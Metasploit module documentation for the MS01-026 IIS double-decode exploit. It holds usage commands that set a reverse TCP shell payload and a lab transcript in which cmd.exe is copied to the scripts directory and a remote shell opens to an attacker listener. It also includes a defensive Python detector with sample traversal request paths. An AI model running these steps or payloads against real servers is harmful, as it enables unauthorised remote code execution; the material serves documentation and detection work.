Vulnerable Application
This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001.
This module has been tested successfully on:
Windows 2000 Professional (SP0) (EN)
Windows 2000 Professional (SP1) (AR)
Windows 2000 Professional (SP1) (CZ)
Windows 2000 Server (SP0) (FR)
Windows 2000 Server (SP1) (EN)
Windows 2000 Server (SP1) (SE)
Note: This module will leave a Metasploit payload in the IIS scripts directory.
Verification Steps
use exploit/windows/iis/ms01_026_dbldecode
set RHOSTS [IP]
set PAYLOAD windows/shell/reverse_tcp
set LHOST [IP]
run
Options
WINDIR
The Windows directory name of the target host. The directory name will be detected automatically if not set.
DEPTH
Traversal depth to reach the drive root (default: 2)
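The following is an added, defender-side example written for this page; it is not part of the module documentation or of Metasploit's own code. It demonstrates the flaw described under Vulnerable Application and the meaning of the DEPTH option: a request path is percent-decoded once and checked for escape from the virtual directory (the check IIS performed), then decoded a second time and checked again (the decode IIS performed after the check when building the filesystem path). A path that only escapes after the second decode is the double-decode pattern this module exploits, and the reported escape depth is the number of levels climbed above the virtual root, which is what DEPTH expresses (2 from a scripts directory at c:\inetpub\scripts). The /scripts mapping and the log lines are constructed assumptions, not captured data.

```python
import re
from urllib.parse import unquote

# Assumption: the /scripts virtual directory maps to c:\inetpub\scripts (constructed, not from the page)
VROOT = "/scripts"


def split_segments(path):
    """IIS accepts both separators, so split on '/' and '\\'."""
    return re.split(r"[\\/]", path)


def escape_depth(path, vroot=VROOT):
    """Number of levels the path climbs above vroot after resolving '.' and '..' (0 = stays inside)."""
    if not path.lower().startswith(vroot.lower()):
        return 0
    depth, lowest = 0, 0
    for seg in split_segments(path[len(vroot):]):
        if seg == "..":
            depth -= 1
            lowest = min(lowest, depth)
        elif seg not in ("", "."):
            depth += 1
    return -lowest


def classify(raw_path, vroot=VROOT):
    """Return (verdict, escape_depth) for a raw request path.

    'single-decode traversal': escape visible after one decode (the original check catches this).
    'double-decode traversal': escape only visible after a second decode (MS01-026 pattern).
    """
    once = unquote(raw_path)
    twice = unquote(once)
    if escape_depth(once, vroot):
        return "single-decode traversal", escape_depth(once, vroot)
    if twice != once and escape_depth(twice, vroot):
        return "double-decode traversal", escape_depth(twice, vroot)
    return "clean", 0


# Constructed sample lines in a simple "client method path status" layout, not real IIS logs
SAMPLE_LOG = [
    "192.168.200.130 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe 200",
    "192.168.200.130 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 404",
    "10.0.0.7 GET /scripts/report%2520q1.pl 200",
    "10.0.0.8 GET /scripts/sub/../hello.pl 200",
]


def scan(lines, vroot=VROOT):
    """Return (client, path, verdict, depth) for every line whose path escapes the virtual root."""
    hits = []
    for line in lines:
        client, _method, path, _status = line.split()
        verdict, depth = classify(path, vroot)
        if verdict != "clean":
            hits.append((client, path, verdict, depth))
    return hits


if __name__ == "__main__":
    for client, path, verdict, depth in scan(SAMPLE_LOG):
        print(f"{client} {path} -> {verdict}, climbs {depth} level(s) above {VROOT}")
```

The second sample line is single-encoded and would have been rejected by the original check, so it is worth logging but is not evidence the check was bypassed; the first line is the one that slipped through. Note that `unquote` handles only standard percent-encoding: IIS's `%uXXXX` form and the overlong UTF-8 sequences of the older Unicode traversal bug need their own decoding step before the same escape check.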
Scenarios
Windows 2000 Server (SP0) (FR)
msf > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(windows/iis/ms01_026_dbldecode) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress - 66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
Shell Banner:
c:\inetpub\scripts>hostname
hostname
win2k-srv-fr